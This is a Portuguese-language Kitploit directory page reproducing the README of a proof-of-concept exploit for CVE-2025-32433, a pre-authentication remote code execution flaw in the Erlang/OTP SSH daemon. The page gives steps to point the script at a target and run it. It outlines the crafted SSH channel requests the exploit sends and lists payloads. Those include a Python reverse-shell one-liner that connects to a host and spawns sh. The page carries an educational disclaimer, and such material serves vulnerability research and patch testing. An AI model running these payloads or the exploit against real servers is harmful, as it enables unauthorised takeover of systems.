Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32433 — Exploit de prova de conceito para CVE-2025-32433, um RCE de pré-autenticação no daemon SSH do Erlang/OTP. Inclui script Python para enviar requisições de canal SSH manipuladas e executar comandos arbitrários. | Kitploit
Ferramentas/GitHubGitHub/mdusmandasthaheer/cve-2025-32433
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubmdusmandasthaheer/cve-2025-32433

CVE-2025-32433

Exploit de prova de conceito para CVE-2025-32433, um RCE de pré-autenticação no daemon SSH do Erlang/OTP. Inclui script Python para enviar requisições de canal SSH manipuladas e executar comandos arbitrários.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 11 mesesAinda não revisado

CVE-2025-32433 – Vulnerabilidade de RCE no SSH do Erlang/OTP

📌 Resumo

O CVE-2025-32433 é uma vulnerabilidade de execução remota de código (RCE) que afeta o daemon SSH do Erlang/OTP. A causa raiz é o tratamento inadequado de solicitações de canal SSH de pré-autenticação, que podem ser manipuladas por um atacante para causar execução arbitrária de comandos antes da autenticação. O PoC incluído demonstra o envio desses pacotes SSH manipulados; por padrão, ele escreve /lab.txt no alvo, mas pode ser adaptado para outros comandos.

⚠️ Aviso: Este repositório é apenas para fins educacionais e de pesquisa. Não use contra sistemas sem permissão explícita.

🛠️ Uso

  1. Edite os detalhes do alvo no script PoC:
root@kitploit:~
HOST = "127.0.0.1"  # Target IP
PORT = 2222         # Target SSH port
  1. Execute o exploit:
root@kitploit:~
python3 cve-2025-32433.py

Por padrão, ele cria /lab.txt contendo "pwned". Modifique o payload em build_channel_request para executar seus próprios comandos.

🧩 Exemplos de Payloads

root@kitploit:~
# Write a file
file:write_file("/lab.txt", <<"pwned">>).

Spawn a reverse shell

os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")

🔧 Como o PoC Funciona (resumo)

  • Conecta-se ao serviço SSH e troca banners.
  • Envia um SSH_MSG_KEXINIT manipulado para parecer um handshake normal.
  • Envia SSH_MSG_CHANNEL_OPEN e SSH_MSG_CHANNEL_REQUEST com um payload exec antes da autenticação.
  • Se vulnerável, o servidor executa o comando Erlang fornecido.

🙏 Créditos

Descoberta e redação por Matt Keeley (Platform Security). Agradecemos a ele por publicar o PoC e compartilhar detalhes.

Link do blog: https://platformsecurity.com/blog/CVE-2025-32433-poc

📚 Referências

  • Blog de Matt Keeley
  • Avisos de Segurança do Erlang/OTP
  • Registro CVE do MITRE
Baixar ferramenta